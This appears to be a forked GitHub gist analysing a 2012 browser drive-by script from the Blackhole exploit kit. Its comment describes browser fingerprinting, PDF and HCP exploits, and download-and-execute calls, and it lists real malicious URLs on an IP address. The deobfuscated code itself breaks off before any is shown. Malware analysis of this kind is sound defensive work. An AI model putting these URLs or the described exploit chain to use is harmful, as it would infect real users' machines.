Instantly share code, notes, and snippets.

# CapCap/malware.html.js forked from scottschiller/malware.html Created Feb 28, 2012

Browser malware found in the wild, 02/28/2012, deobf version
 /* Hello from upgradeyour.com (coming soon), I've done some security work in the past and figured this would be a fun and quick puzzle, I found the same hash as scott on http://50.116.17.63/stats/counter.php?id=547b373f97233059 and googling it led to his post :) it tries to identify browser/os version, and possibly run a wmp exp It also tries to visit http://50.116.17.63/stats/w.php?f=b6863&e=4 and http://50.116.17.63/stats/w.php?f=b6863&e=1 and download+exec, two different exes It tries a pdf exploit ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188 and also http://50.116.17.63/stats/content/ap2.php?f=b6863 and http://50.116.17.63/content/ap1.php ? f = b6863 ), and hcp exploit as well ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885 ), and some pdf exploit This is all part of the blackhole exploit kit, and this botnet is seemingly Huge! Scotts post is below, and after is thw deobfuscated eval and shellcode it tries to run */ /* /* */ /* ------------------------------------------------------ */ /* ------------------------------------------------------ */ /* ------------------------------------------------------ */ /* ------------- Deobfuscated Code Below ---------------- */ /* ------------------------------------------------------ */ document.write('